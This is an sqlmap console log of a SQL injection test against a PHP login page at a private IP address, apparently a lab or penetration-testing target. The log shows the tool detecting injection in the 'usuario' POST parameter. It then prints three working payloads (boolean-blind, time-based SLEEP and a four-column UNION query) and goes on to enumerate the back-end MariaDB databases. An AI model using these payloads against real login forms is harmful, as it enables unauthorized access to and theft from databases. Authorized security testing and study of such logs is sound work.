        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.6#stable}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:45:09 /2026-06-01/

[1/1] URL:
GET http://172.20.17.230/login.php
POST data: usuario=admin&password=x
do you want to test this URL? [Y/n/q]
> Y
[17:45:10] [INFO] testing URL 'http://172.20.17.230/login.php'
[17:45:10] [INFO] using '/home/jamsec/.local/share/sqlmap/output/results-06012026_0545pm.csv' as the CSV results file in multiple targets mode
[17:45:10] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=25c4e6b2409...c57ef58196'). Do you want to use those [Y/n] Y
[17:45:10] [INFO] checking if the target is protected by some kind of WAF/IPS
[17:45:10] [INFO] testing if the target URL content is stable
[17:45:10] [INFO] target URL content is stable
[17:45:10] [INFO] testing if POST parameter 'usuario' is dynamic
[17:45:10] [WARNING] POST parameter 'usuario' does not appear to be dynamic
[17:45:10] [WARNING] heuristic (basic) test shows that POST parameter 'usuario' might not be injectable
[17:45:10] [INFO] testing for SQL injection on POST parameter 'usuario'
[17:45:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
got a 302 redirect to 'http://172.20.17.230/panel.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] N
[17:45:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[17:45:11] [INFO] POST parameter 'usuario' appears to be 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)' injectable (with --code=200)
[17:45:11] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) and risk (2) values? [Y/n] Y
[17:45:11] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[17:45:11] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[17:45:11] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[17:45:11] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[17:45:11] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[17:45:11] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[17:45:11] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[17:45:11] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[17:45:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[17:45:11] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[17:45:11] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[17:45:11] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[17:45:11] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[17:45:11] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[17:45:11] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[17:45:11] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[17:45:11] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[17:45:11] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[17:45:11] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[17:45:11] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[17:45:11] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[17:45:11] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[17:45:11] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[17:45:11] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[17:45:11] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[17:45:11] [INFO] testing 'Generic inline queries'
[17:45:11] [INFO] testing 'MySQL inline queries'
[17:45:11] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[17:45:11] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[17:45:11] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[17:45:11] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[17:45:11] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[17:45:11] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[17:45:11] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[17:45:22] [INFO] POST parameter 'usuario' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[17:45:22] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:45:22] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[17:45:22] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[17:45:22] [INFO] target URL appears to have 4 columns in query
[17:45:22] [INFO] POST parameter 'usuario' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'usuario' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 116 HTTP(s) requests:
---
Parameter: usuario (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: usuario=admin%' AND 2187=(SELECT (CASE WHEN (2187=2187) THEN 2187 ELSE (SELECT 4155 UNION SELECT 9662) END))-- SDtR&password=x

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: usuario=admin%' AND (SELECT 1067 FROM (SELECT(SLEEP(5)))ljGC) AND 'jJXb%'='jJXb&password=x

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: usuario=admin%' UNION ALL SELECT NULL,CONCAT(0x7176766b71,0x4a4841634f636e66646f6d5061796146654f4c687661515647585a7a4957494850526c48656c4d56,0x71706b6a71),NULL,NULL-- -&password=x
---
do you want to exploit this SQL injection? [Y/n] Y
[17:45:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: PHP, Apache 2.4.67
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[17:45:22] [INFO] fetching database names
available databases [2]:
[*] apexgestoria
[*] information_schema

[17:45:22] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 60 times
[17:45:22] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/jamsec/.local/share/sqlmap/output/results-06012026_0545pm.csv'
[17:45:22] [WARNING] your sqlmap version is outdated

[*] ending @ 17:45:22 /2026-06-01/

